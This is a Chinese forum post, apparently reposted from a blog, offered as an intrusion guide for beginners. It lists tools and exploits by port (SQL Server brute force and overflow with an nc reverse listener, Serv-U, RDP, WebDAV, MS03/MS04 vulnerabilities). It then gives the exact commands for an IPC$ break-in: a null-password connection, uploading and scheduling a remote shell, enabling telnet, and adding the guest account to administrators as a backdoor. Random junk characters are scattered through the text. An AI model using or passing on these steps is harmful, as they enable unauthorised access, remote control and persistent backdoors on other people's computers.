TA的每日心情 | 衰 2019-8-18 09:37 |
---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu
7 S- c% Q/ I3 R8 w5 t6 y希望对新手入侵有帮助!
$ S( T/ L' X, e2 \5 X9 u# j 1. 1433端口入侵
4 c- K$ f% N4 U; A+ v5 A scanport.exe 查有1433的机器& Q T F! s4 Q
SQLScanPass.exe 进行字典暴破(字典是关键); }, ~" A) }+ w& |1 {9 S
最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。. i% R1 c, N, g2 u& a( Y7 u. p
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口4 G( w& ~: e: Z7 O5 w
(以上反向的,测试成功)
, z/ x3 z$ d/ C% {0 ` sqlhelloz.exe 入侵ip 1433 (这个是正向连接)" Z5 D/ s+ _) d' `; `
2. 4899端口入侵
, T+ W& p# ^0 {3 ]* d 用4899过滤器.exe,扫描空口令的机器+ t7 X" G6 d3 J$ q! I
3. 3899的入侵6 ? R. ?( [# c2 D7 j
对很早的机器,可以试试3389的溢出(win3389ex.exe)* D- T& z/ v/ c3 I
对2000的机器,可以试试字典暴破。(tscrack.exe)
5 w! ^8 b/ f- j/ b 4. 80入侵8 L O# U2 y, ~ A4 K9 H' _
对sp3以前的机器,可以用webdav入侵;
6 o G2 y- ?+ Y/ {5 `6 f2 l- i( C( j 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
6 H; z( W; ~ H" s b 可以利用SQL进行注入。(啊D的注入软件)。
$ K5 D8 S* z. M( o 5. serv-u入侵(21端口)
; G8 G% C S! b# R$ f5 ^ 对5. 004及以下系统,可用溢出入侵。(serv5004.exe)! W$ ^/ ]5 N# W* b8 K5 w
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
' ?9 y7 ?- [# k6 j 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)% Y+ h0 R+ M! h! i" }
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码4 e8 V2 s& B5 { Y. I, Y: j
6. 554端口# ^( {/ j0 J# x; K5 l. w
用real554.exe入侵。
7 H" ]$ x# E ]( W 7. 6129端口$ ~; w C! y" e- f
用DameWare6129.exe入侵。
- l- X8 S) r0 a+ Q3 j$ H 8. 系统漏洞* M$ U+ e y$ \* S& J
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
' q9 a$ D' J: u! k9. 3127等端口
$ h4 \4 z+ o' }$ _+ W
3 Q* K9 {: A9 s% q- y. A ` 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
6 `- E0 P' ^! T" A 10. 其他入侵* o E) W5 {( U8 C. B- o
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
z1 y3 {# c, q/ l7 B: j: U" c7 c( e* Q# X# W
经典IPC$入侵7 R* `( u) i. s7 }3 y2 W
. [9 m( m$ ^8 ]/ k 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"( @6 ]3 g' J+ A% M; T6 L$ `. P: ^( }
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。/ o& D; x/ I! J3 d5 O' R
2. C:\>copy srv.exe $">\\127.0.0.1\admin$* g% l( T, y5 Y+ h) t: j$ i" K
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
" ?, E. R" ~, e+ V% F8 K 3. C:\>net time file://127.0.0.1// W4 h5 [; w, i9 |
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
+ H% j; b( E* `" | V v( S0 J6 b! Y 4. C:\>at file://127.0.0.1/ 11:05 srv.exe
3 l7 p6 V1 b. \4 t9 ? 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
' D3 a# I3 `# m+ `" z1 B! m6 N 5. C:\>net time file://127.0.0.1/
2 O# g$ n- I6 _; `- H 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。) @6 R) `5 A, `. e. V
6. C:\>telnet 127.0.0.1 99
: A$ f) i, @5 I. w; d 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。8 f3 E3 V# V* f6 g9 F. R- @
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7 _2 J& D9 E! E" k 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$4 C# W. ~8 j2 i9 |* z4 Z0 c
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。* @) n: T4 ~# E: ~* E7 g
8. C:\WINNT\system32>ntlm" l9 y; U% K3 ^/ E4 ^0 a" [
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!9 G' x: Q7 \2 |+ _/ S4 e
9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组$ \5 k/ L) {9 ^( K
10. C:\>net user guest /active:yes ~: E. A' z6 {$ G- b+ b
将对方的Guest用户激活. Q. u- W! E6 c3 Q2 H* d7 c
11. C:\>net user guest 12340 ~! r2 Y. w0 Y! n3 q+ B1 ]1 F/ y
将Guest的密码改为1234,或者你要设定的密码6 I2 c( U) ^; l
12. C:\>net localgroup administrators guest /add
& P- A9 W( n/ b% x 将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|